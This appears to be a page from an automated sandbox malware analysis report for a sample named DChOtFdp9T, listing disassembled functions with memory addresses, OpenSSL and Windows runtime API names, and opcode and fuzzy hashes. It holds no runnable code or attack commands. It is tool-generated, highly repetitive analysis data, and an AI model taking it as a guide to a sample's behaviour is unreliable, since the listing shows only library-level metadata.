                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\s3_lib.c$ssl3_ctx_ctrl
                                                                                                                                                                                                                            • API String ID: 1552677711-780421027
                                                                                                                                                                                                                            • Opcode ID: 9f40065096a489ec579aeff0d82d84e26f7835b22762022f6dd4af4b007f3806
                                                                                                                                                                                                                            • Instruction ID: d1abab71ab91ab144f5888f565858c1e0cd99c41644db7bc31999a788207b2e1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f40065096a489ec579aeff0d82d84e26f7835b22762022f6dd4af4b007f3806
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21F08265B1C981C5EB558765E061AF95311EB843D0FC41232DE3DCA6CFED1CE5408B00
                                                                                                                                                                                                                            Function 00007FFDFF25ED82 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 15COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_check_private_key
                                                                                                                                                                                                                            • API String ID: 1552677711-2796319112
                                                                                                                                                                                                                            • Opcode ID: 6db94ea9f7a0a5273a9064cd9723a29928c20aeccac15a69c6468e03f7ce0fc3
                                                                                                                                                                                                                            • Instruction ID: f06f0fc20cbc5bfc68764da0753a76cd5ef302b604bd8029370e833bce1cbb18
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6db94ea9f7a0a5273a9064cd9723a29928c20aeccac15a69c6468e03f7ce0fc3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8E0EC44B1A6821BE354A770C862AE95701AB82310FC40271E63DD6ADB9D2CA9499B51
                                                                                                                                                                                                                            Function 00007FFDFF25BD80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 15COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$ssl_undefined_function
                                                                                                                                                                                                                            • API String ID: 1552677711-2204979087
                                                                                                                                                                                                                            • Opcode ID: 005a015233e572f9fbda722fc991ec777c59a174368f1848314541746e726609
                                                                                                                                                                                                                            • Instruction ID: 5b7ab559880706c8d27b75440a6b1298f25d0b30e9a73ae0d7979cbfeacde981
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 005a015233e572f9fbda722fc991ec777c59a174368f1848314541746e726609
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7D01704F1928346F748B364D866EE98310AF86300FD44230EA3CC6ADFED2CAA465B10
                                                                                                                                                                                                                            Function 00007FFDFF24DDCF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 15COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\s3_lib.c$ssl3_ctx_ctrl
                                                                                                                                                                                                                            • API String ID: 1552677711-780421027
                                                                                                                                                                                                                            • Opcode ID: 8dc164d9e2ad24b4fe71820d1deaeed4ba554716e3c06c340051bf947e368986
                                                                                                                                                                                                                            • Instruction ID: 30cf1badd11fb1659f7d64aaf455b29b9914be36538535d43a4adee6867a7bb1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8dc164d9e2ad24b4fe71820d1deaeed4ba554716e3c06c340051bf947e368986
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8D0EC55B1C4428AE7449354E432AF953119B85310FC45232DA3DC65DFED3CE9408F00
                                                                                                                                                                                                                            Function 00007FFDFF25BC60 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 15COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$ssl_undefined_function
                                                                                                                                                                                                                            • API String ID: 1552677711-2204979087
                                                                                                                                                                                                                            • Opcode ID: d1d02556990629966e6c130e6a0dfb617911eafb00f0a85022602ccd2e0b8080
                                                                                                                                                                                                                            • Instruction ID: 5b7ab559880706c8d27b75440a6b1298f25d0b30e9a73ae0d7979cbfeacde981
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1d02556990629966e6c130e6a0dfb617911eafb00f0a85022602ccd2e0b8080
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7D01704F1928346F748B364D866EE98310AF86300FD44230EA3CC6ADFED2CAA465B10
                                                                                                                                                                                                                            Function 00007FFDFF25BCC0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 15COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$ssl_undefined_function
                                                                                                                                                                                                                            • API String ID: 1552677711-2204979087
                                                                                                                                                                                                                            • Opcode ID: 97b632edda6d65847e3840af7331bd1ac81c5d9a5cc5879c2577d15010d96115
                                                                                                                                                                                                                            • Instruction ID: 5b7ab559880706c8d27b75440a6b1298f25d0b30e9a73ae0d7979cbfeacde981
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97b632edda6d65847e3840af7331bd1ac81c5d9a5cc5879c2577d15010d96115
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7D01704F1928346F748B364D866EE98310AF86300FD44230EA3CC6ADFED2CAA465B10
                                                                                                                                                                                                                            Function 00007FFDFF25BD20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 15COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$ssl_undefined_function
                                                                                                                                                                                                                            • API String ID: 1552677711-2204979087
                                                                                                                                                                                                                            • Opcode ID: fcd8b18e68ee65f2bb647d68883321d8fc9ea401c62f8de3db0139a3b2eed6d9
                                                                                                                                                                                                                            • Instruction ID: 5b7ab559880706c8d27b75440a6b1298f25d0b30e9a73ae0d7979cbfeacde981
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fcd8b18e68ee65f2bb647d68883321d8fc9ea401c62f8de3db0139a3b2eed6d9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7D01704F1928346F748B364D866EE98310AF86300FD44230EA3CC6ADFED2CAA465B10
                                                                                                                                                                                                                            Function 00007FFDFF25ED01 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 12COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_check_private_key
                                                                                                                                                                                                                            • API String ID: 1552677711-2796319112
                                                                                                                                                                                                                            • Opcode ID: f01a1e306aeb81aaa1ea29a2ccdcb3320a18adca826b765dcde848bbb51b37d3
                                                                                                                                                                                                                            • Instruction ID: 8c8066327da6b5f2d6c1407cf645d62c7eab24ce9743366218aba8067f8adf08
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f01a1e306aeb81aaa1ea29a2ccdcb3320a18adca826b765dcde848bbb51b37d3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63D09E54B1954256E744A360C962EE98311ABC5300FD44231DA3CD55EB9D3CA9465B40
                                                                                                                                                                                                                            Function 00007FF6029B83D0 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                                            • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                                                            • Instruction ID: 332dd5e9d991a9e25a840e94597d944fa3de8dd085fc6cfaa2d312877b281fdc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6119EB2E1CA1301F756112AF6623B91D4BBF5D378F780A34E96E866D7CEECA8414204
                                                                                                                                                                                                                            Function 00007FF6029AA210 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA22F
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA24E
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA276
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA287
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA298
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                            • Opcode ID: 164cce6a714c33d590dbf5a231661e3c170dabd4dca5a082530e71b77cfa47c9
                                                                                                                                                                                                                            • Instruction ID: 02b421b03c9dd081dc2a305b6c1ce0c24cae06c17d3a6b44948bb8b23705faba
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 164cce6a714c33d590dbf5a231661e3c170dabd4dca5a082530e71b77cfa47c9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51114C20E0C70243FB999727964117969926F547B8F344734EC3E86BDBDEADE851C390
                                                                                                                                                                                                                            Function 00007FF6029AA0A4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                            • Opcode ID: 987f2d2f8bcbd6da4d65e957e3df99a19c4bd98af1fd43d774899e04b2e30741
                                                                                                                                                                                                                            • Instruction ID: eb012d2ca46df2bfd2c885f2f8306a9124e049fde9df221e1a15bcc34b7060f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 987f2d2f8bcbd6da4d65e957e3df99a19c4bd98af1fd43d774899e04b2e30741
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2111B10E0C30352FBA9A73758521B919925F5577CF380B38D93ECA6D3DEACB44183A0
                                                                                                                                                                                                                            Function 00007FFDFF242004 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: X509_$E_dupE_freeL_sk_new_nullL_sk_pushX509_get_subject_name
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2231116090-0
                                                                                                                                                                                                                            • Opcode ID: 3d285a002c56b6de86fe131ddd1a0fc9517e9b5a90d74e380aee27a01ffdaadb
                                                                                                                                                                                                                            • Instruction ID: 81b57889901bddf3f4e0d5596b22d4e26e16d4b9aca2922cbe9fe681605da1f6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d285a002c56b6de86fe131ddd1a0fc9517e9b5a90d74e380aee27a01ffdaadb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21014B11F1A64245FF99A766A565BB953909F48BC8F4C0631EE7CCB7CEFE2CE4814200
                                                                                                                                                                                                                            Function 00007FFDFF241DF2 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
